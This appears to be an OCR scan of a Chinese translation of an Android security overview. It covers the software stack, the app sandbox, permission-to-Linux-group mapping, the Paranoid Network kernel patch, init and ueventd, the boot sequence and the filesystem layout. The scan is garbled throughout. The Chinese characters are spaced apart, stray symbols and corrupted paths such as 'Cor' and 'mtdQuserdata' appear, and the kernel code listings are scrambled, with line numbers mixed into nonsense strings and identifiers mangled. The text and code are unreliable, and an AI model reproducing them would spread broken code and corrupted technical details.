码 。 此 规则 最 值得 注意 的 例外 是 Linux 内 核 中 的 更 改 ， 这 些 更 改 在 GNU GPL V2 许可 证 下 。 
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图 1.1 : Android 软件 栈 





Linux 内 核 层 。 在 2005 年 被 Google 认识 之 前 ，Android Æ Android Inc. 公司 的 初创 产品 。 创 
业 公 司 的 特点 之 一 是 ， 他 们 倾向 于 最 大 限度 地 重复 利用 已 经 存在 的 组 件 ， 以 减少 其 产品 的 时 
间 和 成 本 。 Android 公司 选择 Linux 内 核 作为 他 们 新 平台 的 核心 。 在 Android 中 ，Linux 内 核 
负责 进程 ， 内 存 ， 通 信 ， 文 件 系 统管 理 等 。 虽 然 Android 主要 依赖 于 “vanilla" Linux 内 核 功 
能 ， 但 是 已 经 做 出 了 系统 操作 所 需 的 几 个 自 定义 更 改 。 其 中 Binder (一 个 驱动 程序 ， 提 供 对 
Android 中 的 自 定义 RPC / IPC 机 制 的 支持 ) ，Ashmem (替代 标准 的 Linux 共享 内 存 功 

能 ) ，Wakelocks (一 种 防止 系统 进入 睡眠 的 机 制 ) 是 最 值得 注意 的 更 改 [19]。 虽 然 这 些 变化 
被 证 明 在 移动 操作 系统 中 非常 有 用 ， 但 它们 仍然 在 Linux 内 核 的 主要 分 支 之 外 。 


本 地 用 户 空间 层 。 通 过 本 地 用 户 空间 ， 我 们 可 了 解 在 Dalvik 虚拟 机 之 外 运行 的 所 有 用 户 空间 
组 件 ， 并 且 不 属于 Linux Kernel 层 。 这 个 层 的 第 一 个 组 件 是 硬件 抽象 层 (HAL) ， 它 与 Linux 
内 核 和 本 地 用 户 空间 层 之 间 实 际 上 是 模糊 的 。 在 Linux 中 ， 硬 件 驱 动 程序 获 入 到 内 核 中 或 作 
为 模块 动态 加 载 。 虽 然 Android 是 建立 在 Linux 内 核 之 上 ， 它 利用 了 一 种 非常 不 同 的 方法 来 
支持 新 的 硬件 。 相 反 ， 对 于 每 种 类 型 的 硬件 ，Android 定义 了 一 个 API， 它 由 上 层 使 用 并 用 于 
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与 这 种 类 型 的 硬件 交互 。 硬 件 供 应 商 必 须 提 供 一 个 软件 模块 ， 负 责 实 现在 Android 中 为 这 
特定 类 型 的 硬件 定义 的 APl。 因 此 ， 此 解决 方案 不 再 允许 Android 将 所 有 可 能 的 o 


oy 


核 ， 并 禁用 动态 模块 加 载 内 核 机 制 。 提 供 此 功能 的 组 件 在 Android 中 称 为 硬件 抽象 层 。 此 
外 ， 这 样 的 架构 解决 方案 允许 硬件 供应 商 选 择 许可 证 ， 在 其 下 分 发 它们 的 驱动 程序 [18,19] © 


内 核 通 过 启动 一 个 名 为 init 的 用 户 空间 进程 来 完成 其 启动 。 此 过 程 负责 启动 Android 中 的 所 
有 其 他 进程 和 服务 ， 以 及 在 操作 系统 中 执行 一 些 操作 。 例如， 如 果 关 键 服务 在 Android 中 停 
止 应 答 ，init 进程 可 以 重新 启动 它 。 该 进程 根据 init.rc 配置 文件 执行 操作 。 工具 箱包 括 基 
本 的 二 进 制 文件 ， 在 Android [19] 中 提供 shell 工具 的 功能 。 


Android 还 依赖 于 一 些 关键 的 守护 进程 。 它 在 系统 启动 时 启动 ， 并 在 系统 工作 时 保持 它们 运 
行 。 例 如 ， rild (无 线 接口 层 守 护 进 程 ， 负 责 基带 处 理 器 和 其 他 系统 之 间 的 通 

信 ) > servicemanager (一 个 守护 进程 ， 它 包含 在 Android 中 运行 的 所 有 Binder 服务 的 索 
2|) ，adbd (Android Debug Bridge 守护 进程 ， 作 为 主机 和 目标 设备 之 间 的 连接 管理 器 ) 
等 o 

本 地 用 户 空间 中 最 后 一 个 组 件 是 本 地 库 。 有 两 种 类 型 的 本 地 库 : 来 自 外 部 项 目的 本 地 库 ， 以 
及 在 Android 自身 中 开发 的 本 地 库 。 这些 库 被 动态 加 载 并 为 Android 进程 提供 各 种 功能 

[19] ° 


应 用 程序 框架 层 。 Dalvik 是 Android 的 基于 寄存 器 的 虚拟 机 。 它 允许 操作 系统 执行 使 用 Java 
语言 编写 的 Android 应 用 程序 。 在 构建 过 程 中 ，Java 类 被 编译 成 由 Dalvik VM 解释 

的 .dex 文件 。Dalvik VM 特别 设计 为 在 受 限 环境 中 运行 。 此 外 ，Dalvik VM 提供 了 与 系统 其 
余部 分 交互 的 功能 ， 包 括 本 地 二 进 制 和 库 。 为 了 加 速 进程 初始 化 过 程 ，Android 利用 了 一 个 名 
为 Zygote 的 特定 组 件 。 这 是 一 个 将 所 有 核心 库 链接 起 来 的 特殊 “ 预 热 "过 程 。 当 新 应 用 程序 即 
将 运行 时 ，Android 会 从 Zygote 分 配 一 个 新 进程 ， 并 根据 已 启动 的 应 用 程序 的 规范 设置 该 进 
程 的 参数 。 该 解决 方案 允许 操作 系统 不 将 链接 库 复制 到 新 进程 中 ， 从 而 加 快 应 用 程序 启动 操 
作 。 在 Android 中 使 用 的 Java 核心 库 ， 是 从 Apache Harmony 项 目 借 用 的 。 


系统 服务 是 Android 的 最 重要 的 部 分 之 一 。Android 提供 了 许多 系统 服务 ， 它 们 提供 了 基本 
的 移动 操作 系统 功能 ， 供 Android 应 用 开发 人 员 在 其 应 用 中 使 用 。 例 

如 ， PackageManagerService 负 责 管理 (安装 > Lat > Ml 除 等 ) 操作 系统 中 的 Android 包 。 使 
用 INI 接口 系统 服务 可 以 与 本 地 用 户 空间 层 的 守护 进程 ， 工 具 箱 二 进 制 文件 和 本 地 库 进 行 交 
互 。 公 共 API 到 系统 服务 都 是 通过 Android 框架 库 提供 的 。 应 用 程序 开发 人 员 使 用 此 API 与 
系统 服务 进行 交互 。 


Android 应 用 程序 层 。Android 应 用 程序 是 在 Android 上 运行 的 软件 应 用 程序 ， 并 为 用 户 提 供 
大 多 数 功能 。 Stock Android 操作 系统 附带 了 一 些 称 为 系统 应 用 程序 的 内 置 应 用 程序 。 这 些 
是 作为 AOSP 构建 过 程 的 一 部 分 编译 的 应 用 程序 。 此外， 用 户 可 以 从 许多 应 用 市 场 安 装 用 户 
应 用 ， 来 扩展 基本 功能 并 向 操作 系统 引入 新 的 功能 。 


1.2 Android 一 般 安 全 说 明 


Android 安全 概述 


Android 的 核心 安全 原则 是 ， 对 手 应 用 程序 不 应 该 损害 操作 系统 资源 ， 用 户 和 其 他 应 用 程序 。 
为 了 促使 这 个 原则 的 执行 ，Android 是 一 个 分 层 操作 系统 ， 利 用 了 所 有 级 别提 供 的 安全 机 制 。 
专注 于 安全 性 ，Android 结合 了 两 个 层级 的 组 件 : Linux 内 核 层 和 应 用 程序 框架 层 (参见 图 
1.2) 。 


在 Linux 内 核 层级 ， 每 个 应 用 程序 都 在 特殊 的 应 用 程序 沙 箱 中 运行 。 内核 通 过 使 用 标准 Linux 
设施 (进程 分 离 ， 以 及 通过 网 络 套 接 字 和 文件 系统 的 任意 访问 控制 ) 来 强制 隔离 应 用 程序 和 
操作 系统 组 件 。 这 种 隔离 的 实现 是 ， 为 每 个 应 用 程序 分 配 单独 的 Unix 用 户 (UID) 和 组 
(GID) 标识 符 。 这 种 架构 决策 强制 在 单独 的 Linux 进程 中 运行 每 个 应 用 程序 。 因 此 ， 由 于 
在 Linux 中 实现 的 进程 隔离 ， 在 默认 情况 下 ， 应 用 程序 不 能 相互 干扰 ， 并 且 对 操作 系统 提供 
的 设施 具有 有 限 的 访问 。 因 此， 应 用 程序 沙 盒 确保 应 用 程序 不 能 耗 尽 操作 系统 资源 ， 并 且 不 
能 与 其 他 应 用 程序 交互 [3] 。 


Applications 





图 1.2 : Android 内 核实 施 中 的 两 个 层级 


Linux 内 核 层 提供 的 强制 机 制 ， 有 效 地 使 用 沙 箱 ， 将 应 用 程序 与 其 他 应 用 程序 和 系统 组 件 隔 
& o 同时 ， 需 要 有 效 的 通信 协议 来 允许 开发 人 员 重 用 应 用 组 件 并 与 操作 系统 单元 交互 。 该 协 
议 称 为 进程 间 通 信 (IPC) ， 因 为 它 能 够 促进 不 同 进程 之 间 的 交互 。 在 Android P > 
在 Android 中 间 件 层 实现 (在 Linux 内 核 层 上 发 布 的 特殊 驱动 程序 ) 。 此 层级 的 安全 性 由 
IPC 引用 监控 器 提供 。 引用 监控 器 调解 进程 之 间 的 所 有 通信 ， 并 控制 应 用 程序 如 何 访问 系统 
的 组 件 和 其 他 应 用 程序 。 在 Android 中 ，IPC 引用 监控 器 遵循 强制 访问 控制 (MAC ) 访问 控 
制 类 型 。 


默认 情况 下 ， 所 有 Android 应 用 都 在 低 特 权 应 用 程序 沙 箱 中 运行 。 因 此 ， 应 用 程序 只 能 访问 
一 组 有 限 的 系统 功能 。Android 操作 系统 控制 应 用 程序 对 系统 资源 的 访问 ， 这 可 能 会 对 用 户 
体验 造成 不 利 影响 [3] 。 该 控制 以 不 同 的 形式 实现 ， 其 中 一 些 在 以 下 章节 中 详细 描述 。 还 有 一 
部 分 受 保 护 的 系统 功能 (例如 ， 摄 像 头 ， 电 话 或 GPS 功能 ) ， 其 访问 权限 应 该 提供 给 第 三 方 
应 用 程序 。 然而 ， 这 种 访问 应 以 受 控 的 方式 提供 。 在 Android 中 ， 这 种 控制 使 用 权限 来 实 
现 。 基 本 上 ， 每 个 提供 受 保护 系统 资源 的 访问 的 敏感 API 都 被 分 配 有 一 个 权限 

(Permission) - 它 是 唯一 的 安全 标签 。 此 外 ， 受 保护 特性 还 可 能 包括 其 他 应 用 的 组 件 。 
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为 了 使 用 受 保 护 的 功能 ， 应 用 程序 的 开发 者 必须 在 文件 AndroidManifest.xml 中 请 求 相应 的 权 
限 。 在 安装 应 用 程序 期 间 ，Android 操作 系统 将 解析 此 文件 ， 并 向 用 户 提供 此 文件 中 声明 的 
权限 列表 。 应 用 程序 的 安装 根据 “全 有 或 全 无 "原则 进行 ， 这 意味 着 仅 当 接受 所 有 权限 时 才 安 
装 应 用 程序 。 否则 ， 将 不 会 安装 应 用 程序 。 权限 仅 在 安装 时 授予 ， 以 后 无 法 修改 。 作为 权限 
的 示例 ， 我 们 考虑 需要 监控 SMS 传 入 消息 的 应 用 程序 。 在 这 种 情况 

下 ， AndroidManifest.xml 文件 必须 在 <uses-permission> 标签 中 包含 以 下 上 声 


8] : android.permission.RECEIVE SMS ° 


应 用 程序 尝试 使 用 某 个 功能 ， 并 且 该 功能 尚未 在 Android 清单 文件 中 声明 ， 通 常会 产生 安全 
性 异常 。 在 下 面 几 节 中 我 们 会 讲解 权限 实现 机 制 的 细节 。 


第 二 章 Android Linux 内 核 层 安全 


来 源 : Yury Zhauniarovich | Publications 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


作为 最 广为人知 的 开源 项 目 之 一 ，Linux 已 经 被 证 明 是 一 个 安全 ， 可 信和 稳定 的 软件 ， 全 世界 
数 千 人 对 它 进 行 研究 ， 攻 击 和 打 补 丁 。 不 出 所 料 ，Linux 内 核 是 Android 操作 系统 的 基础 
[3]。Android 不 仅 依 赖 于 Linux 的 进程 ， 内 存 和 文件 系统 管理 ， 它 也 是 Android 安全 架构 中 
最 重要 的 组 件 之 一 。 在 Android 中 ，Linux 内 核 负责 配置 应 用 沙 盒 ， 以 及 规范 一 些 权限 。 


2.4 LAWS 


让 我 们 考虑 一 个 Android 应 用 安装 的 过 程 。Android 应 用 以 Android 软件 包 ( .apk ) 文件 的 
形式 分 发 。 一 个 包 由 Dalvik 可 执行 文件 ， 资 源 ， 本 地 库 和 清单 文件 组 成 ， 并 由 开发 者 签名 来 
签名 。 有 三 个 主要 媒介 可 以 在 Android 操作 系统 的 设备 上 安装 软件 包 : 


e Google Play 
。 软件 包 安 装 程序 
e adb install 工具 


Google Play 是 一 个 特殊 的 应 用 ， 它 为 用 户 提供 查找 由 第 三 方 开发 人 员 上 传 到 市 场 的 应 用 ， 以 
及 安装 该 应 用 的 功能 。 虽 然 它 也 是 第 三 方 应 用 ， 但 Google Play 应 用 (因为 使 用 与 操作 系统 
相同 的 签名 进行 签名 ) 可 访问 Android 的 受 保 护 组 件 ， 而 其 他 第 三 方 应 用 则 缺少 这 些 组 件 。 
如 果 用 户 从 其 他 来 源 安装 应 用 ， 则 通常 隐 式 使 用 软件 包 安 装 程序 。 此 系统 应 用 提供 了 用 于 启 
动 软件 包 安 装 过 程 的 界面 。 由 Android 提供 的 adb install 工具 主要 由 第 三 方 应 用 开发 人 员 使 
用 。 虽 然 前 两 个 媒介 需要 用 户 在 安装 过 程 中 同意 权限 列表 ， 但 后 者 会 安静 地 安装 应 用 。 这 就 
是 它 主要 用 于 开发 工具 的 原因 ， 旨 在 将 应 用 安装 在 设备 上 进行 测试 。 该 过 程 如 图 2.1 HEF 
部 分 所 示 。 此 图 显示 了 Android 安全 体系 结构 的 更 详细 的 概述 。 我 们 将 在 本 文中 参考 它 来 解 
释 这 个 操作 系统 的 特性 。 


在 Linux 内 核 层 配置 应 用 沙 箱 的 过 程 如 下 。 在 安装 过 程 中 ， 每 个 包 都 会 被 分 配 一 个 唯一 的 用 
户 标识 符 (UID) 和 组 标识 符 (GID) ， 在 设备 的 应 用 生命 周期 内 不 会 更 改 。 因此， 在 
Android 中 每 个 应 用 都 有 一 个 相应 的 Linux 用 户 。 用 户 名 遵循 格式 appx ， 并 且 该 用 户 的 
UID 等 于 Process.FIRST APPLICATION UID + x ， 其 中 Process.FIRST APPLICATION UID 常量 对 应 
于 10000 。 例 如 ， 在 图 2.1 T ^ exi.apk 包 在 安装 期 间 获 得 了 用 户 名 app 1 ，UID 等 于 
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图 2.1 : Android 安全 架构 


在 Linux 中 ， 内 存 中 的 所 有 文件 都 受 Linux 自 定义 访问 控制 (DAC) 的 约束 。 访 问 权 限 由 文 
件 的 创建 者 或 所 有 者 为 三 种 用 户 类 型 设置 : 文件 的 所 有 者 ， 与 所 有 者 在 同一 组 中 的 用 户 和 所 
有 其 他 用 户 。 对 于 每 种 类 型 的 用 户 ， 分 配 读 ， 写 和 执行 ( r-w-x ) 权限 的 元 组 。 因 此 ， 因 为 
每 个 应 用 都 有 自己 的 UID 和 GID，Linux 内 核 强制 应 用 在 自己 的 隔离 地 址 空间 内 执行 。 除 此 
之 外 ， 应 用 唯一 的 UID 和 GID 由 Linux 内 核 使 用 ， 以 实现 不 同 应 用 之 间 的 设备 资源 〈 内 存 ， 
CPU 等 ) 的 公平 分 离 。 安 装 过 程 中 的 每 个 应 用 也 会 获得 自己 的 主 目录 ， 例 

如 /data/data/package name ， 其 中 package name 是 Android 软件 包 的 名 称 ， 例 

如 com.ex.exi ° Æ Android 中 ， 这 个 文件 夹 是 内 部 存储 目录 ， 其 中 应 用 将 私有 数据 放 在 里 
面 。 分 配给 此 目录 的 Linux 权限 只 允许 “所 有 者 "应 用 写 入 并 读 取 此 目录 。 有 一 些 例外 应 该 提 
到 。 使 用 相同 证 书签 名 的 应 用 能 够 在 彼此 之 间 共 享 数 据 ， 可 以 拥有 相同 的 UID 或 甚至 可 以 在 
相同 的 进程 中 运行 。 


这 些 架构 决策 在 Linux 内 核 层 上 建立 了 高 效 的 应 用 沙 箱 。 这 种 类 型 的 沙 箱 很 简单 ， 并 基于 
Linux 可 选 访问 控制 模型 (DAC) 的 验证 。 幸 运 的 是 ， 因 为 沙 爹 在 Linux 内 核 层 上 执行 ， 本 
地 代码 和 操作 系统 应 用 也 受到 本 章 [3] 中 所 描述 的 这 些 约束 的 约束 。 


2.2 Linux 内 核 层 上 的 权限 约束 


通过 将 Linux 用 户 和 组 所 有 者 分 配给 实现 此 功能 的 组 件 ， 可 以 限制 对 某 些 系统 功能 的 访问 。 
这 种 类 型 的 限制 可 以 应 用 于 系统 资源 ， 如 文件 ， 驱 动 程序 和 套 接 字 。 Android 使 用 文件 系统 
权限 和 特定 的 内 核 补丁 〈 称 为 Paranoid Networking) [13] 来 限制 低级 系统 功能 的 访问 ， 如 网 
络 套 接 字 ， 摄 像 机 设备 ， 外 部 存储 器 ， 日 志 读 取 能 力 等。 


使 用 文件 系统 权限 访问 文件 和 设备 驱动 程序 ， 可 以 限制 进程 对 设备 某 些 功能 的 访问 。 例 如 ， 
这 种 技术 被 应 用 于 限制 应 用 对 设备 相机 的 访问 。 /dev/cam 设备 驱动 程序 的 权限 设置 

为 6660 ， 属 于 root 所 有 者 和 摄像 机 所 有 者 组 。 这 意味 着 只 有 以 root 身份 运行 或 包含 在 摄 
像 机 组 中 的 进程 才能 读 取 和 写 入 此 设备 驱动 程序 。 因 此 ， 仅 包括 在 相机 组 中 的 应 用 程序 可 以 
与 相机 交互 。 权 限 标签 和 相应 组 之 问 的 映射 在 文件 框架 /base/data/etc/platform.xml P Æ 
义 ， 摘 录 如 清单 2.1 所 示 。 因 此 ， 在 安装 过 程 中 ， 如 果 应 用 程序 已 请 求 访问 摄像 机 功能 ， 并 
且 用 户 已 批准 该 应 用 程序 ， 则 还 会 为 此 应 用 程序 分 配 一 个 摄像 机 Linux 组 GID (请 参阅 清单 
2.1 中 的 第 8 行 和 第 9 行 ) 。 因 此 ， 此 应 用 程序 可 以 从 /dev/cam 设备 驱动 程序 读 取信 息 。 


<permissions> 


«permission name="android.permission. INTERNET" > 
<group gid="inet" /> 
</permission> 
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<permission name="android.permission.CAMERA" > 
<group gid="camera" /> 

10 </permission> 

12 <permission name="android.permission.READ_LOGS" > 
13 <group gid="log" /> 

14 </permission> 


16 </permissions> 


代码 2.1 : 权限 标签 和 Linux 组 之 间 的 映射 


Android 中 有 一 些 地 方 可 以 用 于 设置 文件 、 驱 动 和 Unix 套 接 字 的 文件 系统 权限 : init 程 
序 ，init.rc 配置 文件 ， ueventd.rc 配置 文件 和 系统 ROM 文件 系统 配置 文件 。 它们 在 第 3 


章 中 会 详细 讨论 。 


在 传统 的 Linux 发 行 版 中 ， 允 许 所 有 进程 启动 网 络 连 接 。 同 时， 对 于 移动 操作 系统 ， 必 须 控 
制 对 网 络 功能 的 访问 。 为 了 在 Android 中 实现 此 控制 ， 需 要 添加 特殊 的 内 核 补丁 ， 将 网 络 设 
施 的 访问 限制 于 属于 特定 Linux 组 或 具有 特定 Linux 功能 的 进程 。 这 些 针 对 Android 的 Linux 
内 核 补丁 已 经 获得 了 Paranoid 网 络 的 名 称 。 例如 ， 对 于 负责 网 络 通信 的 AF_INET 套 接 字 地 址 
族 ， 此 检查 在 kernel/net/ipv4/af_inet.c 文件 中 执行 (参见 清单 2.2 中 的 代码 片段 ) ° Linux 
组 和 Paranoid 网 络 的 权限 标签 之 间 的 映射 也 在 platform.xml 文件 中 设置 (例如 ， 参 见 清单 
2.1 中 的 第 4 行 ) © 


{ 
J 


#else 


{ 


#endif 


pipe pa pa pac pen t 
O0 50NPOOO0-IOococB50o0NHPÀD 


Vis 


a 


NBER 
C OON 


{ 


NNNN 
AUNE 


#ifdef CONFIG_ANDROID_PARANOID_NETWORK 
#include <linux/android_aid.h> 


static inline int current has network ( void ) 


return in egroup p (AID INET) || capable (CAP NET RAW) ; 





static inline int current has network ( void ) 


return J 


* Create an inet socket 


static int inet create ( struct net *net , struct socket *sock , int protocol , 


int kern ) 


25 if (!current_has_network() ) 


27 
28 } 


26 return -EACCES; 


代码 2.2 : Paranoid 网 络 补 丁 


类 似 的 Paranoid 网 络 补丁 也 适用 于 限制 访问 IPv6 和 蓝牙 [19] © 


这 些 检 查 中 使 用 的 常量 在 内 核 中 硬 编码 ， 并 在 kernel/include/linux/android aid.h 文件 中 规 
定 (参见 清单 2.3) © 


#ifndef 
#define 


/* AIDS 
#define 
#define 
#define 
#define 
10 #define 
11 #define 
12 #define 
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14 #endif 


LINUX ANDROID. AID H 
LINUX ANDROID. AID H 


that the kernel treats differently */ 

AID OBSOLETE 000 3001 /* was NET BT ADMIN */ 

AID OBSOLETE 001 3002 /* was NET BT */ 

AID INET 3003 

AID NET RAW 3004 

AID NET ADMIN 3005 

AID NET BW STATS 3006 /* read bandwidth statistics */ 

AID NET BW ACCT 3007 /* change bandwidth statistics accounting */ 





代码 2.3 : 硬 编码 在 Linux 内 核 中 的 Android ID 常量 


因此 ， 在 Linux 内 核 层 ， 通 过 检查 应 用 程序 是 否 包含 在 特殊 预定 义 的 组 中 来 实现 Android 权 
限 。 只 有 此 组 的 成 员 才 能 访问 受 保 护 的 功能 。 在 应 用 程序 安装 期 间 ， 如 果 用 户 已 同意 所 请 求 
的 权限 ， 则 该 应 用 程序 包括 在 相应 的 Linux 组 中 ， 因 此 获得 对 受 保 护 功能 的 访问 。 


Android Linux 内 核 层 安全 
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Android 本 地 用 户 空 间 层 安全 


第 三 章 Android 本 地 用 户 空间 层 安 全 


来 源 : Yury Zhauniarovich | Publications 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


本 地 用 户 空 间 层 在 Android 操作 系统 的 安全 配置 中 起 到 重要 作用 。 不 理解 在 该 层 上 发 生 了 什 
么 ， 就 不 可 能 理解 在 系统 中 如 何 实施 安全 架构 决策 。 在 本 章 中 ， 我 们 的 主题 是 Android 引导 
过 程 和 文件 系统 特性 的 ， 并 且 描 述 了 如 何在 本 地 用 户 空 间 层 上 保证 安全 性 。 


3.1 Android 引导 过 程 


要 了 解 在 本 地 用 户 空间 层 上 提供 安全 性 的 过 程 ， 首 先 应 考虑 Android 设备 的 引导 顺序 。 要 注 
意 ， 在 第 一 步 中 ， 这 个 顺序 可 能 会 因 不 同 的 设备 而 剧 ， 但 是 在 Linux 内 核 加 载 之 后 ， 过 程 通 
常 是 相同 的 。 引 导 过 程 的 流程 如 图 3.1 所 示 。 
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图 3.1 : Android 启动 顺序 


当 用 户 打开 智能 手机 时 ， 设 备 的 CPU 处 于 未 初始 化 状态 。 在 这 种 情况 下 ， 处 理 器 从 硬 连 线 地 
址 开始 执行 命令 。 该 地 址 指向 Boot ROM 所 在 的 CPU 的 写 保护 存储 器 中 的 一 段 代码 (参见 图 
3.4 中 的 步骤 1) 。 代 码 驻 留 在 Boot ROM 上 的 主要 目的 是 检测 Boot Loader (引导 加 载 程 
Fe) 所 在 的 介质 [17]。 检 测 完 成 后 ，Boot ROM 将 引导 加 载 程序 加 载 到 内 存 中 〈 仅 在 设备 通电 
后 可 用 ) ， 并 跳 转 到 引导 Boot Loader 的 加 载 代码 。 反 过 来 ，Boot Loader 建立 了 外 部 

RAM ， 文件 系统 和 网 络 的 支持 。 之 后 ， 它 将 Linux 内 核 加 载 到 内 存 中 ， 并 将 控制 权 交 给 它 。 
Linux 内 核 初始 化 环境 来 运行 C 代码 ， 激 活 中 断 控制 器 ， 设 置 内 存 管理 单元 ， 定 义 调度 ， 加 
载 驱 动 程序 和 挂 载 根 文件 系统 。 当 内 存 管 理 单元 初始 化 时 ， 系 统 为 使 用 虚拟 内 存 以 及 运行 用 
户 空间 进程 [17] 做 准备 。 实 际 上 ， 从 这 一 步 开 始 ， 该 过 程 就 和 运行 Linux 的 台式 计算 机 上 发 生 
的 过 程 没什么 区 别 了 。 

第 一 个 用 户 空间 进程 是 init ， 它 是 Android 中 所 有 进程 的 祖先 。 该 程序 的 可 执行 文件 位 于 
Android 文件 系统 的 根 目 录 中 。 清单 3.1 包含 此 可 执行 文件 的 主要 部 分 。 可 以 看 出 ， init 二 
进 制 负责 创建 文件 系统 基本 条 目 (7 到 16 行 ) 。 之 后 (第 18 行 ) ， 程 序 解析 init.rc 配置 
文件 并 执行 其 中 的 命令 。 


1 int main( int argc, char **argv ) 

2{ 

3 TB 

4 if (!strcmp (basename( argv[0] ), "ueventd") ) 
5 return ueventd main ( argc, argv ) ; 

6 — 

7 mkdir("/dev", 0755) ; 

8 mkdir("/proc", 0755) ; 

9 mkdir("/sys", 0755) ; 

10 


Hs mount("tmpfs", "/dev", "tmpfs", MS NOSUID, "mode=0755") ; 
12 mkdir("/dev/pts", 0755) ; 

13  mkdir("/dev/socket", 0755) ; 

14 mount("devpts", "/dev/pts", "devpts", 0, NULL) ; 

15 mount("proc", "/proc", "proc", 0, NULL) ; 

16 mount("sysfs", "/sys", "sysfs", ©, NULL) ; 


18 init parseconfig file("/init.rc") ; 


代码 3.1 : init 程序 源码 


init.rc 配置 文件 使 用 一 种 称 为 Android Init Language 的 语言 编写 ， 位 于 根 目 录 下 。 这 个 配 
置 文件 可 以 被 想象 为 一 个 动作 列表 (命令 序列 ) ， 其 执行 由 预定 义 的 事件 触发 。 例 如 ， 在 清 
单 3.2 中 ，fs ( 行 1) 是 一 个 触发 器 ， 而 第 4-7 行 代表 动作 。 在 init.rc 配置 文件 中 编写 
的 命令 定义 系统 全 局 变量 ， 为 内 存 管理 设置 基本 内 核 参数 ， 配 置 文件 系统 等 。 从 安全 角度 来 

看 ， 更 重要 的 是 它 还 负责 基本 文件 系统 结构 的 创建 ， 并 为 创建 的 节点 分 配 所 有 者 和 文件 系统 

权限 。 


on fs 
# mount mtd partitions 
# Mount /system rw first to give the filesystem a chance to save a checkpoint 
mount yaffs2 mtd@system /system 
mount yaffs2 mtd@system /system ro remount 
mount yaffs2 mtdQuserdata /data nosuid nodev 
mount yaffs2 mtdQcache /cache nosuid nodev 
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代码 3.2 : 模拟 器 中 的 fs 触发 器 上 执行 的 动作 列表 


此 外 ， init 程序 负责 在 Android 中 启动 几 个 基本 的 守护 进程 和 进程 (参见 图 3.1 中 的 步骤 
5) 其 参数 也 在 init.rc 文件 中 定义 。 默认 情况 下 ， 在 Linux 中 执行 的 进程 以 与 祖先 相同 的 
权限 (在 相同 的 UID 下) 运行 。 在 Android 中 ，init 以 root 权 限 ( UID = o ) 启动 。 这 
意味 着 所 有 后 代 进 程 应 该 使 用 相同 的 UID 运行 。 幸运 的 是 ， 特 权 进 程 可 以 将 其 UID REAR 
少 特权 的 进程 。 因 此 ，init 进程 的 所 有 后 代 可 以 使 用 该 功能 来 指定 派生 进程 的 UID 和 
GID (所 有 者 和 组 也 在 init.rc 文件 中 定义 ) 。 


第 一 个 守护 进程 派生 于 init 进程 ， 它 是 ueventd 守护 进程 。 这 个 服务 运行 自己 的 main 函数 
(参见 清单 3.1 中 的 第 5 行 ) ， 它 读 取 ueventd.rc 和 ueventd.[device name].rc 配置 文件 ， 
并 重 放 指 定 的 内 核 uevent_hotplug 事件 。 这 些 事 件 设置 了 不 同 设备 的 所 有 者 和 权限 (参见 清 
3.3) 。 例如， 第 5 行 显示 了 如 何 设置 文件 系统 对 / dev/cam 设备 的 权限 ，2.2 节 中 会 涉及 

这 个 例子 。 之 后 ， 守 护 进程 等 待 监听 所 有 未 来 的 热 插 拔 事件 。 


ueventd.rc 


Jb ths 
2 /dev/ashmem 0666 root root 
3 /dev/binder 0666 root root 
au 
5 /dev/cam 0660 root camera 
6 TE. 


代码 3.3 : ueventd.rc X fF 


由 init 程序 启动 的 核心 服务 之 一 是 servicemanager (请 参阅 图 3.1 中 的 步骤 5) 。 OUR 
当 在 Android 中 运行 的 所 有 服务 的 索引 。 它 必须 在 早期 阶段 可 用 ， 因 为 以 ee 
服务 都 应 该 有 可 能 注册 自己 ， 从 而 对 操作 系统 的 其 余部 分 可 见 [19] © 


init 进程 启动 的 另 一 个 核心 进程 是 Zygote。 Zygote 是 一 个 热身 完毕 的 特殊 进程 。 这 意味 着 
进程 已 经 被 初始 化 并 且 链 接 到 核心 库 。 Zygote 是 所 有 进程 的 祖先 。 当 一 个 新 的 应 用 启动 

E ' Zygote 会 派生 自己 。 之 后 ， 为 派生 子 进程 设置 对 应 于 新 应 用 的 参数 ， 例 如 UID * 

GID > nice-name 等 。 它 能 够 加 速 新 进程 的 创建 ， 因 为 不 需要 将 核心 库 复 制 到 新 进程 中 。 新 

进程 的 内 存 具 有 " 写 时 复制 " (COW) 保护 ， 这 意味 着 只 有 当 后 者 尝试 写 入 受 保护 的 内 存 时 ， 

数据 才 会 从 zygote 进程 复制 到 新 进程 。 从 而 ， 核 心 库 不 会 改变 ， 它 们 只 保留 在 一 个 地 方 ， 减 

少 内 存 消耗 和 应 用 启动 时 间 。 


使 用 Zygote 运行 的 第 一 个 进程 是 System Server (图 3.1 中 的 步骤 6) 。 这 个 进程 首先 运行 
本 地 服务 ， 例 如 SurfaceFlinger 和 SensorService » 在 服务 初始 化 之 后 ， 调 用 回调 ， 启 动 剩 
余 的 服务 。 所 有 这 些 服务 之 后 使 用 servicemanager 注册 。 


3.2 Android 文件 系统 


虽然 Android 基于 Linux 内 核 ， 它 的 文件 系统 层次 不 符合 文件 系统 层次 标准 [10]， 它 了 定义 类 
Unix 系统 的 文件 系统 布局 ( 见 清单 3.4) © Android 和 Linux 中 的 某 些 目录 是 相同 的 ， 例 

如 /dev ? /proc ? /sys ， /etc ， /mnt 等 。 这 些 文件 夹 的 用 途 与 Linux 中 的 相同 。 A 

时 ， 还 有 一 些 目录 ， 如 Cor ， /data 和 /cache ， 它 们 不 存在 于 Linux 系统 中 。 这 些 文件 
X Android 的 核心 。 在 Android 操作 系统 的 构建 期 间 ， 会 创建 三 个 映像 文 

f: system.img °’ userdata.img 和 cache. img ° 这 些 映像 提供 Android 的 核心 功能 ， 是 在 设 
备 的 闪存 上 存储 的 。 在 系统 引导 期 间 ， init 程序 将 这 些 映像 安装 到 预定 义 的 安装 点 ， 

如 /System ? /data 和 /cache (参见 清单 3.2) 8 


drwxr-xr-x root root 2013-04-10 08 : 13 acct 

drwxrwx--- system cache 2013-04-10 08 : 13 cache 

dr-x------ root root 2013-04-10 08 : 13 config 

lrwxrwxrwx root root 2013-04-10 08 : 13 d -» /sys/kernel/debug 
drwxrwx--x system system 2013-04-10 08 : 14 data 

-rw-r--r-- root root 116 1970-01-01 00 : 00 default . prop 
drwxr-xr-x root root 2013-04-10 08 : 13 dev 

lrwxrwxrwx root root 2013-04-10 08 : 13 etc -> /system/etc 
-rwxr-x--- root root 244536 1970-01-01 00 : 00 init 

10 -rwxr-x--- root root 2487 1970-01-01 00 : 00 init . goldfish . rc 
